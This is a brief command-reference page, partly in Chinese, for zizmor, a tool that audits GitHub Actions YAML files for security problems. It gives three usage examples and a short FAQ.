Linux command
zizmor 命令
文本
复制后可按需替换文件名、目录或参数。
常用示例
Audit all GitHub Actions in current directory
zizmor .
Output in SARIF format
zizmor --format sarif [.github/workflows/]
Run fully offline
zizmor --offline .
说明
zizmor audits GitHub Actions YAML files for security issues including template injection vulnerabilities, mutable tag pinning, and known advisory usage. It has approximately 24 audit rules, generates SARIF output for GitHub code scanning integration, and supports offline mode by default.
FAQ
What is the zizmor command used for?
zizmor audits GitHub Actions YAML files for security issues including template injection vulnerabilities, mutable tag pinning, and known advisory usage. It has approximately 24 audit rules, generates SARIF output for GitHub code scanning integration, and supports offline mode by default.
How do I run a basic zizmor example?
Run `zizmor .` in a terminal, then adjust file names, paths, flags, or remote targets for your system.
Where can I find more zizmor examples?
This page includes 3 examples for zizmor, plus related commands for nearby Linux tasks.